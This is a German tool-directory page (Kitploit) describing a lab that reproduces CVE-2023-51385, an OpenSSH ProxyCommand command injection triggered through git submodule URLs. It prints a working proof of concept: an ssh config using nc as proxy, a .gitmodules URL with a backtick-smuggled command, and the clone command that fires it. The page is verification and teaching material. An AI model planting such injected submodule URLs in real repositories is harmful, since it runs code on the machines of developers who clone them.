Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/lsp1025923/cve-2023-51385
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHublsp1025923/cve-2023-51385

cve-2023-51385

Reproduktionslabor für CVE-2023-51385: Befehlsinjektion in OpenSSH ProxyCommand über bösartige Git-Submodul-URLs. Schritt-für-Schritt-Anleitung zur Überprüfung der Schwachstelle.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-51385 verifizieren

Zuerst muss der folgende Inhalt in ~/.ssh/config hinzugefügt werden:

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

Die Anweisung in der .gitmodules-Datei enthält eine Befehlsinjektion:

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

Nach der Konfiguration führe den folgenden Befehl aus, um es auszulösen:

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

Bei erfolgreicher Ausführung wird im Verzeichnis CVE-2023-51385_test eine Datei cve.txt erstellt.

image-20240317161540677

Hinweis: OpenSSH muss <9.6p1 sein

Weitere Informationen findest du in diesem Blog:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

"# cve-2023-51385"

Tool herunterladen